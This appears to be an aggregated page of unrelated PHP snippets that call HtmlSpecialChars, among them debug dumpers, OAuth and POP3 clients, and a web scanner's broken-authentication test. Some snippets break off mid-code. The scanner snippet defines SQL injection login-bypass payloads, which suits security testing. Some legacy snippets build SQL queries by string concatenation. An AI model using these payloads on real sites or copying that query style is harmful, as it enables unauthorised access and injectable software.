/** * Помощник для отладки * * @version 1.0 * @author Ibragimov "MpaK" Renat <*****@*****.**> * @copyright Copyright (c) 2009-2010, BESTWEB ltd. www.BESTWEB.ru */ function TextDump(&$Var, $Level = 0) { $out = ''; if (is_array($Var)) { $Type = "Array[" . count($Var) . "]"; } else { if (is_object($Var)) { $Type = "Object"; } else { $Type = ""; } } if ($Type) { $out .= "{$Type}\n"; for (Reset($Var), $Level++; list($k, $v) = each($Var);) { if (is_array($v) && $k === "GLOBALS") { continue; } for ($i = 0; $i < $Level * 3; $i++) { $out .= " "; } $out .= "<b>" . HtmlSpecialChars($k) . "</b> => " . TextDump($v, $Level); } } else { $out .= '"' . HtmlSpecialChars($Var) . '"' . "\n"; } return $out; }
/** * @author Melvil (https://github.com/Melvil) **/ function dumpVar(&$Var, $Level = 0, $Var_s = null, $level_limit = 5) { $is_ob_ar = false; $Type = gettype($Var); if (is_array($Var)) { $is_ob_ar = true; $Type = 'Array[' . count($Var) . ']'; } if (is_object($Var)) $is_ob_ar = true; if ($Level == 0) { if ($Var_s) echo NL . '<br>' . NL . '<b><span style="color:#ff0000">' . $Var_s . ' = {</span></b>'; if ($is_ob_ar && count($Var)) echo '<pre>' . NL; else echo NL . '<tt>'; $Level_zero = 0; } if ($is_ob_ar) { if ($Type == 'object') echo '<span style="color:#05a209">object of</span> <span style="color:#A03000">' . get_class($Var) . '</span>'; else echo '<span style="color:#05a209">' . $Type . '</span>'; if ($Level > $level_limit) { if ($level_limit > 1) echo '<b>...</b> LEVEL > 5<br>' . NL; else echo NL; return; } echo NL; if ($Level == 0 || !is_object($Var)) for (Reset($Var), $Level++; list($k, $v)=each($Var);) { for ($i = 0; $i < $Level*3; $i++) echo ' '; echo '<b>'.HtmlSpecialChars($k).'</b> => '; // if (is_object($v) || ($k === 'GLOBALS' && is_array($v))) { echo "\n"; continue; } if ($k === 'GLOBALS' && is_array($v)) { echo NL; continue; } dumpVar($v, $Level, null, $level_limit); } } else { $iss = is_string($Var); if ($iss && strlen($Var)>400) echo '('.$Type.') <span style="color:#35BBFA">strlen = '.strlen($Var).'</span>' . NL; else { echo '(' . $Type . ') ' . ($iss ? '"' : '') . '<span style="color:#0000FF">'; if ($Type == 'boolean') echo ($Var ? 'true' : 'false'); else echo HtmlSpecialChars($Var); echo '</span>' . ($iss ? '"' : '') . NL; } } if (isset($Level_zero)) { if ($is_ob_ar && count($Var)) echo '</pre>'; else echo '</tt>'; if ($Var_s) echo '<b><span style="color:#ff0000">}</span></b><br>' . NL; } return true; }
function OutputDebug($message) { $message .= "\n"; if ($this->html_debug) { $message = str_replace("\n", "<br />\n", HtmlSpecialChars($message)); } echo $message; flush(); }
function Output($message) { global $html; if ($html) { echo nl2br(HtmlSpecialChars($message)); } else { echo $message, "\n"; } }
public function GoogleUser() { $client = new \Google_Client(); $client->setApplicationName(\SKT_GOOGLEOAUTH2_SETAPPLICATIONNAME); // Visit https://code.google.com/apis/console?api=plus to generate your // oauth2_client_id, oauth2_client_secret, and to register your oauth2_redirect_uri. $client->setClientId(\SKT_GOOGLEOAUTH2_SETCLIENTID); $client->setClientSecret(\SKT_GOOGLEOAUTH2_SETCLIENTSECRET); $client->setRedirectUri(\SKT_GOOGLEOAUTH2_SETREDIRECTURI); $client->setDeveloperKey(\SKT_GOOGLEOAUTH2_SETDEVELOPERKEY); $oauth2 = new \Google_Oauth2Service($client); if (isset($_GET['code'])) { $client->authenticate($_GET['code']); $_SESSION['token'] = $client->getAccessToken(); $redirect = \SITE_SERVER; \CmsDev\Header\refresh::refreshNow(\filter_var($redirect, FILTER_SANITIZE_URL)); return; } if (isset($_SESSION['token'])) { $client->setAccessToken($_SESSION['token']); } if (isset($_REQUEST['logout']) or \THIS_URL_REAL === 'UserLogout') { unset($_SESSION['token']); $client->revokeToken(); } if ($client->getAccessToken()) { $user = $oauth2->userinfo->get(); // These fields are currently filtered through the PHP sanitize filters. // See http://www.php.net/manual/en/filter.filters.sanitize.php $this->family_name = filter_var($user['family_name'], \FILTER_SANITIZE_STRING); $this->name = filter_var($user['name'], \FILTER_SANITIZE_STRING); $this->locale = filter_var($user['locale'], \FILTER_SANITIZE_STRING); $this->gender = filter_var($user['gender'], \FILTER_SANITIZE_STRING); $this->email = filter_var($user['email'], \FILTER_SANITIZE_EMAIL); $this->link = filter_var($user['link'], \FILTER_SANITIZE_URL); $this->given_name = filter_var($user['given_name'], \FILTER_SANITIZE_STRING); $this->id = filter_var($user['id'], \FILTER_SANITIZE_STRING); $this->verified_email = filter_var($user['verified_email'], \FILTER_SANITIZE_STRING); if (isset($user['picture']) && $user['picture'] != '') { $this->picture = filter_var($user['picture'], \FILTER_VALIDATE_URL); } else { $this->picture = \SKT_ACCESS_AVATAR; } $this->ClientAuth = 'Google'; $_SESSION['token'] = $client->getAccessToken(); $this->createAuthUrl = $client->createAuthUrl(); $this->Info = array('family_name' => HtmlSpecialChars($this->family_name), 'name' => HtmlSpecialChars($this->name), 'locale' => $this->locale, 'gender' => $this->gender, 'email' => $this->email, 'link' => $this->link, 'given_name' => HtmlSpecialChars($this->given_name), 'id' => $this->id, 'verified_email' => $this->verified_email, 'picture' => $this->picture, 'ClientAuth' => $this->ClientAuth, 'createAuthUrl' => $this->createAuthUrl); \CmsDev\Security\UserRegister::checkAction($this->Info); return true; } else { $this->createAuthUrl = $client->createAuthUrl(); new \CmsDev\Url\refer(); return false; } }
function db_write($sql) { $result = mysql_query($sql); if (!$result) { echo "<hr /><pre>"; echo "ERROR: " . HtmlSpecialChars(mysql_error()) . "\n"; echo "SQL : " . HtmlSpecialChars($sql) . "\n"; echo "STACK: " . HtmlSpecialChars(db_trace()) . "\n"; echo "</pre><hr />\n"; } return $result; }
function test_table($show){ $uid = $GLOBALS['pageuids']++; $num = count($show); echo "<div id=\"tests-{$uid}-1\"><a href=\"#\" onclick=\"show('$uid'); return false;\" style=\"font-size: 12px;\">Show $num tests</a></div>\n"; echo "<div id=\"tests-{$uid}-2\" style=\"display: none;\"><a href=\"#\" onclick=\"hide('$uid'); return false;\" style=\"font-size: 12px\">Hide tests</a><br />\n"; echo "<table border=1>\n"; echo "<tr><th>ID</th><th>Address</th><th>Expected</th></tr>\n"; foreach ($show as $id){ $test = $GLOBALS['tests'][$id]; $address = $test['address']; $address = wordwrap($address, 50, "{FORCEBREAK}", true); $address = HtmlSpecialChars($address); $address = str_replace(array("\r","\n"," ","\0"), array("&#13;","&#10;"," ","&#0;"), $address); $address = str_replace('{FORCEBREAK}', "\n ", $address); echo "<tr>"; echo "<td>$test[id]</td>"; echo "<td><small>".HtmlSpecialChars($address)."</small></td>"; if ($test['valid']){ if ($test['warning']){ echo "<td>Pass w/ Warning</td>"; }else{ echo "<td>Pass</td>"; } }else{ echo "<td>Fail</td>"; } echo "</td></tr>\n"; } echo "</table>\n"; echo "</div>\n"; }
"><?php echo HtmlSpecialChars($endpoint['docs_url']); ?> </a> </li> <?php } ?> <?php foreach ($endpoint['example_urls'] as $example_url) { ?> <li> Example: <a href="<?php echo HtmlSpecialChars($example_url); ?> "><?php echo HtmlSpecialChars($example_url); ?> </a> </li> <?php } ?> <?php foreach ($endpoint['notes'] as $note) { ?> <li><?php echo format_html($note); ?> </li> <?php }
ob_start(); //testing show the raw email //echo "Message: \n".$msg."\n"; //includes require 'resources/pop3/mime_parser.php'; require 'resources/pop3/rfc822_addresses.php'; if (file_exists($_SERVER["PROJECT_ROOT"] . "/app/emails/email_translation.php")) { require_once $_SERVER["PROJECT_ROOT"] . "/app/emails/email_translation.php"; } //parse the email message $mime = new mime_parser_class(); $mime->decode_bodies = 1; $parameters = array('Data' => $msg); $success = $mime->Decode($parameters, $decoded); if (!$success) { echo "MIME message decoding error: " . HtmlSpecialChars($mime->error) . "\n"; } else { //get the headers //print_r($decoded[0]); $headers = json_decode($decoded[0]["Headers"]["x-headers:"], true); $subject = $decoded[0]["Headers"]["subject:"]; $from = $decoded[0]["Headers"]["from:"]; $reply_to = $decoded[0]["Headers"]["reply-to:"]; $to = $decoded[0]["Headers"]["to:"]; $date = $decoded[0]["Headers"]["date:"]; //get the body $body = ''; //$parts_array["Parts"][0]["Headers"]["content-type:"]; //get the body $body = ''; $content_type = $decoded[0]['Headers']['content-type:'];
function testFetch($url) { $http = new http_class(); owa_coreAPI::debug('hello owa_http testfetch method'); /* Connection timeout */ $http->timeout = 0; /* Data transfer timeout */ $http->data_timeout = 0; /* Output debugging information about the progress of the connection */ $http->debug = 1; $http->user_agent = owa_coreAPI::getSetting('base', 'owa_user_agent'); $http->follow_redirect = 1; $http->redirection_limit = 5; $http->exclude_address = ""; $http->prefer_curl = 0; $arguments = array(); $error = $http->GetRequestArguments($url, $arguments); $error = $http->Open($arguments); //for(;;) // { $error = $http->ReadReplyBody($body, 50000); if ($error != "" || strlen($body) == 0) { owa_coreAPI::debug(HtmlSpecialChars($body)); } // } }
function cff_autolink_do($text, $link_color, $sub, $limit, $tagfill, $auto_title, $span_tag, $force_prefix = null) { $text_l = StrToLower($text); $cursor = 0; $loop = 1; $buffer = ''; while ($cursor < strlen($text) && $loop) { $ok = 1; $matched = preg_match($sub, $text_l, $m, PREG_OFFSET_CAPTURE, $cursor); if (!$matched) { $loop = 0; $ok = 0; } else { $pos = $m[0][1]; $sub_len = strlen($m[0][0]); $pre_hit = substr($text, $cursor, $pos - $cursor); $hit = substr($text, $pos, $sub_len); $pre = substr($text, 0, $pos); $post = substr($text, $pos + $sub_len); $fail_text = $pre_hit . $hit; $fail_len = strlen($fail_text); # # substring found - first check to see if we're inside a link tag already... # $bits = preg_split("!</a>!i", $pre); $last_bit = array_pop($bits); if (preg_match("!<a\\s!i", $last_bit)) { #echo "fail 1 at $cursor<br />\n"; $ok = 0; $cursor += $fail_len; $buffer .= $fail_text; } } # # looks like a nice spot to autolink from - check the pre # to see if there was whitespace before this match # if ($ok) { if ($pre) { if (!preg_match('![\\s\\(\\[\\{>]$!s', $pre)) { #echo "fail 2 at $cursor ($pre)<br />\n"; $ok = 0; $cursor += $fail_len; $buffer .= $fail_text; } } } # # we want to autolink here - find the extent of the url # if ($ok) { if (preg_match('/^([a-z0-9\\-\\.\\/\\-_%~!?=,:;&+*#@\\(\\)\\$]+)/i', $post, $matches)) { $url = $hit . $matches[1]; $cursor += strlen($url) + strlen($pre_hit); $buffer .= $pre_hit; $url = html_entity_decode($url); # # remove trailing punctuation from url # while (preg_match('|[.,!;:?]$|', $url)) { $url = substr($url, 0, strlen($url) - 1); $cursor--; } foreach (array('()', '[]', '{}') as $pair) { $o = substr($pair, 0, 1); $c = substr($pair, 1, 1); if (preg_match("!^(\\{$c}|^)[^\\{$o}]+\\{$c}\$!", $url)) { $url = substr($url, 0, strlen($url) - 1); $cursor--; } } # # nice-i-fy url here # $link_url = $url; $display_url = $url; if ($force_prefix) { $link_url = $force_prefix . $link_url; } if ($GLOBALS['autolink_options']['strip_protocols']) { if (preg_match('!^(http|https)://!i', $display_url, $m)) { $display_url = substr($display_url, strlen($m[1]) + 3); } } $display_url = cff_autolink_label($display_url, $limit); # # add the url # if ($display_url != $link_url && !preg_match('@title=@msi', $tagfill) && $auto_title) { $display_quoted = preg_quote($display_url, '!'); if (!preg_match("!^(http|https)://{$display_quoted}\$!i", $link_url)) { $tagfill .= ' title="' . $link_url . '"'; } } $link_url_enc = HtmlSpecialChars($link_url); $display_url_enc = HtmlSpecialChars($display_url); if (substr($link_url_enc, 0, 4) !== "http") { $link_url_enc = 'http://' . $link_url_enc; } $buffer .= "<a href=\"{$link_url_enc}\">{$display_url_enc}</a>"; } else { #echo "fail 3 at $cursor<br />\n"; $ok = 0; $cursor += $fail_len; $buffer .= $fail_text; } } } # # add everything from the cursor to the end onto the buffer. # $buffer .= substr($text, $cursor); return $buffer; }
?> <HTML> <HEAD> <TITLE>mnoGoSearch: <? echo HtmlSpecialChars(StripSlashes($query_orig)); ?></TITLE> </HEAD> <body BGCOLOR="#FFFFFF" LINK="#0050A0" VLINK="#0050A0" ALINK="#0050A0"> <center> <FORM METHOD=GET ACTION="<? echo $self; ?>"> <table bgcolor=#eeeee0 border=0 width=100%> <tr><td> <BR> <INPUT TYPE="hidden" NAME="ps" VALUE="10"> Search for: <INPUT TYPE="text" NAME="q" SIZE=50 VALUE="<? echo HtmlSpecialChars(StripSlashes($query_orig)); ?>"> <INPUT TYPE="submit" VALUE="Search!"><BR> Results per page: <SELECT NAME="ps"> <OPTION VALUE="10" <? if ($ps==10) echo 'SELECTED';?>>10 <OPTION VALUE="20" <? if ($ps==20) echo 'SELECTED';?>>20 <OPTION VALUE="50" <? if ($ps==50) echo 'SELECTED';?>>50 </SELECT> Match: <SELECT NAME="m"> <OPTION VALUE="all" <? if ($m=='all') echo 'SELECTED';?>>All <OPTION VALUE="any" <? if ($m=='any') echo 'SELECTED';?>>Any <OPTION VALUE="bool" <? if ($m=='bool') echo 'SELECTED';?>>Boolean </SELECT>
/** * close server connection and delete marked messages * * @return bool * @author Elias Müller **/ public function close() { if (($error = $this->server->Close()) == "") { return true; } else { Error::addError("Fehler beim Trennen der Verbindung zum Mail-Server: " . HtmlSpecialChars($error), true); return false; } }
function FormatCompleteValue($result) { return HtmlSpecialChars($result[0]); }
for ($header_value = 0; $header_value < count($headers[$header_name]); $header_value++) { echo $header_name . ": " . $headers[$header_name][$header_value], "\r\n"; } } else { echo $header_name . ": " . $headers[$header_name], "\r\n"; } } echo "</PRE>\n"; flush(); echo "<H2><LI>Response body:</LI</H2>\n<PRE>\n"; for (;;) { $error = $http->ReadReplyBody($body, 1000); if ($error != "" || strlen($body) == 0) { break; } echo HtmlSpecialChars($body); } echo "</PRE>\n"; flush(); } } $http->Close(); } if (strlen($error)) { echo "<CENTER><H2>Error: ", $error, "</H2><CENTER>\n"; } ?> </UL> <HR> </BODY> </HTML>
<option value="w"<?php if ($mode === 'w') { echo ' selected'; } ?> >Word</option> <option value="l"<?php if ($mode === 'l') { echo ' selected'; } ?> >Line</option> </select></div> <?php if (isset($_POST['compare'])) { $diff = new diff_class(); $difference = new stdClass(); $difference->mode = $mode; $difference->patch = true; $after_patch = new stdClass(); if ($diff->FormatDiffAsHtml($before, $after, $difference) && $diff->Patch($before, $difference->difference, $after_patch)) { echo '<div>Difference</div><div class="frameResults">', $difference->html, '</div>'; echo '<div>Patch</div><div class="frameResults">', $after === $after_patch->after ? 'OK: The patched text matches the text after.' : 'There is a BUG: The patched text (<b>' . HtmlSpecialChars($after_patch->after) . '</b>) does not match the text after (<b>' . HtmlSpecialChars($after) . '</b>).', '</div>'; } else { echo '<div>Error: ', HtmlSpecialChars($diff->error), '</div>'; } } ?> </form> </body> </html>
$DOM->AddChild('Head', $Script); #------------------------------------------------------------------------------- $Script = new Tag('SCRIPT', array('type' => 'text/javascript', 'src' => 'SRC:{Js/TicketFunctions.js}')); #------------------------------------------------------------------------------- $DOM->AddChild('Head', $Script); #------------------------------------------------------------------------------- #------------------------------------------------------------------------------- $DOM->AddAttribs('Body', array('onload' => "window.document.getElementById('Message').focus();")); #------------------------------------------------------------------------------- #------------------------------------------------------------------------------- $Comp = Comp_Load('Formats/Edesk/Number', $TicketID); if (Is_Error($Comp)) { return ERROR | @Trigger_Error(500); } #------------------------------------------------------------------------------- $DOM->AddText('Title', HtmlSpecialChars(SPrintF('#%s | %s', $Comp, $Ticket['Theme']))); #------------------------------------------------------------------------------- #------------------------------------------------------------------------------- $Comp = Comp_Load('Form/Input', array('name' => 'TicketID', 'type' => 'hidden', 'value' => $Ticket['ID'])); if (Is_Error($Comp)) { return ERROR | @Trigger_Error(500); } #------------------------------------------------------------------------------- $Form = new Tag('FORM', array('name' => 'TicketReadForm', 'onsubmit' => 'return false;', 'OnKeyPress' => 'ctrlEnterEvent(event,true) && TicketAddMessage();'), $Comp); #------------------------------------------------------------------------------- #------------------------------------------------------------------------------- $MaxMessageID = DB_Select('EdesksMessagesOwners', 'MAX(`ID`) AS `MaxMessageID`', array('UNIQ', 'Where' => SPrintF('`EdeskID` = %u', $Ticket['ID']))); #------------------------------------------------------------------------------- switch (ValueOf($MaxMessageID)) { case 'error': return ERROR | @Trigger_Error(500);
echo "<PRE>", HtmlSpecialChars($body[$line]), "</PRE>\n"; } echo "<PRE>---Message body ends above---</PRE>\n"; if (($error = $pop3->DeleteMessage(1)) == "") { echo "<PRE>Marked message 1 for deletion.</PRE>\n"; if (($error = $pop3->ResetDeletedMessages()) == "") { echo "<PRE>Resetted the list of messages to be deleted.</PRE>\n"; } } } } if ($error == "" && ($error = $pop3->Close()) == "") { echo "<PRE>Disconnected from the POP3 server "" . $pop3->hostname . "".</PRE>\n"; } } else { $error = $result; } } else { $error = $result; } } } } if ($error != "") { echo "<H2>Error: ", HtmlSpecialChars($error), "</H2>"; } ?> </BODY> </HTML>
function dumper($foo) { echo "<pre style=\"text-align: left;\">"; echo HtmlSpecialChars(var_export($foo, 1)); echo "</pre>\n"; }
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8" /> <title>EMoji HTML Test</title> <link href="emoji.css" rel="stylesheet" type="text/css" /> </head> <body> <table border="1"> <tr> <th>Unified</th> <th>Name</th> <th>Unified Text</th> <th>HTML</th> </tr> <?php foreach (array(0x2600, 0x1f493, 0x1f502) as $unified) { $bytes = "Hello " . emoji_utf8_bytes($unified) . " World"; echo "<tr>\n"; echo "<td>" . sprintf('U+%04X', $unified) . "</td>\n"; echo "<td>" . HtmlSpecialChars(emoji_get_name($unified)) . "</td>\n"; echo "<td>{$bytes}</td>\n"; echo "<td>" . emoji_unified_to_html($bytes) . "</td>\n"; echo "</tr>\n"; } ?> </table> </body> </html>
case 5: $timeo = 300; break; case 10: $timeo = 600; break; default: $timeo = 120; break; } $time = $now + 600; mysql_query("LOCK TABLES offers WRITE"); while (mysql_fetch_array(mysql_query("SELECT * FROM offers WHERE time=" . $time . ""))) { $time++; } $comment = HtmlSpecialChars($comment); mysql_query("INSERT INTO offers (`time`,`type`,`size_left`,`size_right`,`timeout`,`comment`, `blood`, `kulak`, `zone_width`, `zone_height`) VALUES (" . $time . ",1,1,1," . $timeo . ",'" . $comment . "'," . $blood . "," . $kulak . ",6,3)"); mysql_query("UNLOCK TABLES"); mysql_query("INSERT INTO participants (`time`,`id`,`side`,`base`,`hp`,`x`,`y`) VALUES (" . $time . "," . $stat['id'] . ",0," . $levels['base'] . "," . $stat['hp_now'] . ",1,1)"); } echo "<script>parent.main.location=\"battle.php?tmp=\"+Math.random();\"\"</script>"; } elseif ($page == "take_it" && $offer) { $shmot = mysql_fetch_array(mysql_query("select * from slots where id=" . $stat['id'] . "")); $user_offer = mysql_fetch_array(mysql_query("SELECT offers.time FROM offers, participants WHERE offers.time>" . $now . " AND offers.done=0 AND participants.time=offers.time AND participants.id=" . $stat['id'] . "")); if ($user_offer) { $offer_str = "Для начала с одной заявкой разберись..."; } else { $participants = mysql_query("SELECT * FROM participants WHERE participants.time=" . $offer . ""); switch (mysql_num_rows($participants)) { case 1: if ($stat['hp_now'] < ($stat['vitality'] * 5 + $stat['hp']) / 3) {
$message_file = 'pop3://' . $user . ':' . $password . '@localhost/' . $message . '?debug=' . $debug . '&html_debug=' . $html_debug . '&realm=' . $realm . '&workstation=' . $workstation . '&apop=' . $apop . '&authentication_mechanism=' . $authentication_mechanism; /* * Access Gmail POP account */ /* $message_file='pop3://'.$user.':'.$password.'@pop.gmail.com:995/1?tls=1&debug=1&html_debug=1'; */ $mime = new mime_parser_class(); /* * Set to 0 for not decoding the message bodies */ $mime->decode_bodies = 1; $parameters = array('File' => $message_file); $success = $mime->Decode($parameters, $decoded); if (!$success) { echo '<h2>MIME message decoding error: ' . HtmlSpecialChars($mime->error) . "</h2>\n"; } else { echo '<h2>MIME message decoding successful</h2>' . "\n"; echo '<h2>Message structure</h2>' . "\n"; echo '<pre>'; print_r($decoded[0]); echo '</pre>'; if ($mime->Analyze($decoded[0], $results)) { echo '<h2>Message analysis</h2>' . "\n"; echo '<pre>'; print_r($results); echo '</pre>'; } else { echo 'MIME message analyse error: ' . $mime->error . "\n"; } }
function decode_num_entity($orig_type, $d) { if ($d < 0) { $d = 32; } # treat control characters as spaces # # don't mess with high characters - what to replace them with is # character-set independant, so we leave them as entities. besides, # you can't use them to pass 'javascript:' etc (at present) # if ($d > 127) { if ($orig_type == '%') { return '%' . dechex($d); } if ($orig_type == '&') { return "&#{$d};"; } } # # we want to convert this escape sequence into a real character. # we call HtmlSpecialChars() incase it's one of [<>"&] # return HtmlSpecialChars(chr($d)); }
$verify = array(); if ($form->WasSubmitted('doit')) { if (($error_message = $form->Validate($verify)) == '') { $doit = 1; } else { $doit = 0; $error_message = HtmlEntities($error_message); } } else { $error_message = ''; $doit = 0; } if (!$doit) { $form->ConnectFormToInput('dependent', 'ONLOAD', 'Focus', array()); } $onload = HtmlSpecialChars($form->PageLoad()); ?> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Test for Manuel Lemos' PHP form class for dependent validation</title> <style type="text/css"><!-- .invalid { border-color: #ff0000; background-color: #ffcccc; } // --></style> </head> <body onload="<?php echo $onload; ?> " bgcolor="#cccccc"> <center><h1>Test for Manuel Lemos' PHP form class for dependent validation</h1></center> <hr />
function Output() { if (strlen($this->authorization_error) || strlen($this->access_token_error) || strlen($this->access_token)) { ?> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>OAuth client result</title> </head> <body> <h1>OAuth client result</h1> <?php if (strlen($this->authorization_error)) { ?> <p>It was not possible to authorize the application.<?php if ($this->debug) { ?> <br>Authorization error: <?php echo HtmlSpecialChars($this->authorization_error); } ?> </p> <?php } elseif (strlen($this->access_token_error)) { ?> <p>It was not possible to use the application access token. <?php if ($this->debug) { ?> <br>Error: <?php echo HtmlSpecialChars($this->access_token_error); } ?> </p> <?php } elseif (strlen($this->access_token)) { ?> <p>The application authorization was obtained successfully. <?php if ($this->debug) { ?> <br>Access token: <?php echo HtmlSpecialChars($this->access_token); if (isset($this->access_token_secret)) { ?> <br>Access token secret: <?php echo HtmlSpecialChars($this->access_token_secret); } } ?> </p> <?php if (strlen($this->access_token_expiry)) { ?> <p>Access token expiry: <?php echo $this->access_token_expiry; ?> UTC</p> <?php } } ?> </body> </html> <?php } }
$message .= "<b>Новый пароль</b>: {$newpass}<br/><br/><br/><br/>"; $message .= "<b style='color:green'>С уважением. администрация WWW.MEYDAN.AZ.</b>"; $headers = 'MIME-Version: 1.0' . "\r\n"; $headers .= 'Content-type: text/html; charset=windows-1251' . "\r\n"; $headers .= 'From: WWW.MEYDAN.AZ <*****@*****.**>' . "\r\n"; if (mail($db["email"], $subject, $message, $headers)) { $mess .= "<b style='color:#ff0000'>Внимание! Письмо с паролем будет отправлено на почту указанный в анкете в течении 5 минут.</b><br/>"; } else { $mess .= "<b style='color:#ff0000'>Внимание! Не удалось отправить пароль на e-mail, указанный в анкете!</b><br/>"; } $mess .= 'Новый пароль сохранен.'; } } if ($_POST['dochmail']) { $old_mail = HtmlSpecialChars(addslashes(strtolower(trim($_POST['old_mail'])))); $new_mail = HtmlSpecialChars(addslashes(strtolower(trim($_POST['new_mail'])))); $ok = true; if (trim($new_mail) == '') { $ok = false; $mess = 'Задан пустой почтовый адрес.'; } if (!preg_match('#^[a-z0-9.!\\#$%&\'*+-/=?^_`{|}~]+@([0-9.]+|([^\\s]+\\.+[a-z]{2,6}))$#si', $new_mail)) { $ok = false; $mess = "Ошибка. Неверно введен почтовый адрес."; } if ($old_mail != $db["email"]) { $ok = false; $mess = "Ошибка. Старый почтовый адрес указан неверно."; } if ($ok) { $date = date("d.m.Y H:i");
function _db_query($sql, $cluster, $shard) { $cluster_key = _db_cluster_key($cluster, $shard); if (!$GLOBALS['db_conns'][$cluster_key]) { _db_connect($cluster, $shard); } $trace = _db_callstack(); $use_sql = _db_comment_query($sql, $trace); $start = microtime_ms(); $result = @mysql_query($use_sql, $GLOBALS['db_conns'][$cluster_key]); $end = microtime_ms(); $GLOBALS['timings']['db_queries_count']++; $GLOBALS['timings']['db_queries_time'] += $end - $start; log_notice('db', "DB-{$cluster_key}: {$sql} ({$trace})", $end - $start); # # profiling? # $profile = null; if ($GLOBALS['cfg']['db_profiling']) { $profile = array(); $p_result = @mysql_query("SHOW PROFILE ALL", $GLOBALS['db_conns'][$cluster_key]); while ($p_row = mysql_fetch_array($p_result, MYSQL_ASSOC)) { $profile[] = $p_row; } } # # build result # if (!$result) { $error_msg = mysql_error($GLOBALS['db_conns'][$cluster_key]); $error_code = mysql_errno($GLOBALS['db_conns'][$cluster_key]); log_error("DB-{$cluster_key}: {$error_code} " . HtmlSpecialChars($error_msg)); $ret = array('ok' => 0, 'error' => $error_msg, 'error_code' => $error_code, 'sql' => $sql, 'cluster' => $cluster, 'shard' => $shard); } else { $ret = array('ok' => 1, 'result' => $result, 'sql' => $sql, 'cluster' => $cluster, 'shard' => $shard); } if ($profile) { $ret['profile'] = $profile; } return $ret; }
function ClassPageHead(&$form) { return '<script type="text/javascript" src="' . HtmlSpecialChars($this->javascript_path) . 'animation.js"></script>' . "\n"; }
?> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Yahoo OAuth client results</title> </head> <body> <?php echo '<h1>', HtmlSpecialChars($user->query->results->profile->nickname), ' you have logged in successfully with Yahoo!</h1>'; echo '<pre>', HtmlSpecialChars(print_r($user, 1)), '</pre>'; ?> </body> </html> <?php } else { ?> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>OAuth client error</title> </head> <body> <h1>OAuth client error</h1> <p>Error: <?php echo HtmlSpecialChars($client->error); ?> </p> </body> </html> <?php }
function testAuthenticationSQLi($urlToCheck, $urlOfSite, $testId) { connectToDb($db); updateStatus($db, "Testing {$urlToCheck} for Broken Authentication using SQL Injection...", $testId); $log = new Logger(); $log->lfile('logs/eventlogs'); $log->lwrite("Starting Broken Authentication SQLi test function on {$urlToCheck}"); $postUrl = $urlToCheck; $postUrlPath = parse_url($postUrl, PHP_URL_PATH); //Check URL is not responding with 5xx codes $log->lwrite("Checking what response code is received from {$urlToCheck}"); $http = new http_class(); $http->timeout = 0; $http->data_timeout = 0; //$http->debug=1; $http->user_agent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"; $http->follow_redirect = 1; $http->redirection_limit = 5; $http->setTestId($testId); $error = $http->GetRequestArguments($urlToCheck, $arguments); $error = $http->Open($arguments); $log->lwrite("URL to be requested is: {$urlToCheck}"); if ($error == "") { $log->lwrite("Sending HTTP request to {$urlToCheck}"); $error = $http->SendRequest($arguments); if ($error == "") { $headers = array(); $error = $http->ReadReplyHeaders($headers); if ($error == "") { $responseCode = $http->response_status; //This is a string $log->lwrite("Received response code: {$responseCode}"); if (intval($responseCode) >= 500 && intval($responseCode) < 600) { $log->lwrite("Response code: {$responseCode} received from: {$urlToCheck}"); return; } } } $http->Close(); } if (strlen($error)) { echo "<H2 align=\"center\">Error: ", $error, "</H2>\n"; $log->lwrite("Error: {$error}"); } $html = file_get_html($postUrl, $testId); if (empty($html)) { //This can happen due to file_get_contents returning a 500 code. Then the parser won't parse it updateStatus($db, "Problem getting contents from {$urlToCheck}...", $testId); $log->lwrite("Problem getting contents from {$urlToCheck}"); return; } //Array containing all form objects found $arrayOfForms = array(); //Array containing all input fields $arrayOfInputFields = array(); $log->lwrite("Searching {$postUrl} for forms"); $formNum = 1; //Must use an integer to identify form as forms could have same names and ids foreach ($html->find('form') as $form) { isset($form->attr['id']) ? $formId = htmlspecialchars($form->attr['id']) : ($formId = ''); isset($form->attr['name']) ? $formName = htmlspecialchars($form->attr['name']) : ($formName = ''); isset($form->attr['method']) ? $formMethod = htmlspecialchars($form->attr['method']) : ($formMethod = 'get'); isset($form->attr['action']) ? $formAction = htmlspecialchars($form->attr['action']) : ($formAction = ''); $formMethod = strtolower($formMethod); //If the action of the form is empty, set the action equal to everything //after the URL that the user entered if (empty($formAction)) { $strLengthUrl = strlen($urlToCheck); $strLengthSite = strlen($urlOfSite); $firstIndexOfSlash = strpos($urlToCheck, '/', $strLengthSite - 1); $formAction = substr($urlToCheck, $firstIndexOfSlash + 1, $strLengthUrl); } $log->lwrite("Found form on {$postUrl}: {$formId} {$formName} {$formMethod} {$formAction} {$formNum}"); $newForm = new Form($formId, $formName, $formMethod, $formAction, $formNum); array_push($arrayOfForms, $newForm); foreach ($form->find('input') as $input) { isset($input->attr['id']) ? $inputId = htmlspecialchars($input->attr['id']) : ($inputId = ''); isset($input->attr['name']) ? $inputName = htmlspecialchars($input->attr['name']) : ($inputName = ''); isset($input->attr['value']) ? $inputValue = htmlspecialchars($input->attr['value']) : ($inputValue = ''); isset($input->attr['type']) ? $inputType = htmlspecialchars($input->attr['type']) : ($inputType = ''); $log->lwrite("Found input field on {$postUrl}: {$inputId} {$inputName} {$formId} {$formName} {$inputValue} {$inputType} {$formNum}"); $inputField = new InputField($inputId, $inputName, $formId, $formName, $inputValue, $inputType, $formNum); array_push($arrayOfInputFields, $inputField); } $formNum++; } //At this stage, we should have captured all forms and their input fields into the appropriate arrays //Begin testing each of the forms //Defintion of all payloads used and warnings to examine for //Payloads can be added to this $arrayOfPayloads = array("1'or'1'='1", "1'or'1'='1';#"); //Check if the URL passed into this function displays the same webpage at different intervals //If it does then attempt to login and if this URL displays a different page, the vulnerability is present //e.g. a login page would always look different when you are and are not logged in 